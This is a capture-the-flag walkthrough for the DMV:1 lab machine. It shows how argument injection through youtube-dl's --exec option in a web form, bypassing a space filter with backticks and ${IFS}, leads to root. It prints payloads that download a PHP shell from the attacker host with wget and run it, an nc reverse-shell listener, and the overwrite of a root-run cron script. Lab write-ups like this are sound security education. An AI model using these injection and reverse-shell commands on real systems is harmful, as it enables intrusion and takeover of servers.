top of page
Search

DMV:1

In this article we are going to solve another boot2root challenge DMV:1 . This is a beginner level challenge if you know Linux shell properly.


walkthrough


IP of the target : 192.168.43.75


First we start with scanning the target for open ports and services running inside the system using the command : sudo nmap -A 192.168.43.75

only two ports are open so we decided to enumerate HTTP Service .

Okay we have a form here that ask for the Video ID to convert it into mp3.we tried some random id here but the result was a failure. So now we decided to use any actual ID (here ID means : https://www.youtube.com/watch?v=ID) . So after providing a valid ID we have a message on the screen that says Download MP3.

So now here we thought of OS Command injection vulnerability and tried some common techniques to bypass the security but we failed to do so.

Now we intercept the packet by providing any random ID in the input box and lets see how the request packet looks like , may be we can find something useful there!

we can see that the form is using POST request to save the ID in a variable yt_url .

now we send this request to repeater to perform more operations.

we remove everything from yt_url and replace it with "haclabs" and then send the request and we can see that in response packet there is a line "or res youtube-dl" this means that this website is using youtube-dl to download the MP3 . So we searched on the internet about youtube-dl and found many options we can use with it . To confirm that this youtube-dl we use the option "--version" .


we can see in the response packet that the version is correctly displayed here! Now we can use --exec option to execute OS commands and can have the reverse shell!

So we decided to run some basic commands like id ,whoami but we failed to execute any command .

Now we decided to analyze the Response packet very carefully and found that spaces are blocked here . means yt_url will not accept spaces in the string or in the command we want to execute.

in the response we can see that url_orginal is having only --exec and the actual command we sent was --exec ls . So now we tried to run it as --exec`whoami`

and yes we succeed this time.

now we tried some more command having spaces like uname -a , ls -al but we failed again because again there is space . Now if we remember there is an environment variable which holds the space and that is ${IFS} , and yes it worked! So now we decided to upload the shell on the target system using the command : --exec`wget${IFS}http://192.168.43.248/shell.php`

shell has been uploaded successfully in the system .

we run the shell using the command : --exec`php${IFS}shell.php` and we start the listener on our linux machine using the command nc -nvlp <port> and then we have the reverse shell.

now we decided to find SUID binary but failed and we also checked for the user privileges but no results . So now we decided to download pspy32 in the target system and run it .we observed there is bash file that is executed by the root .

Now we change the directory to /var/www/html/tmp/ and there we found this clean.sh file .

www-data can write this file so we overwrite this file with a quick reverse shell code.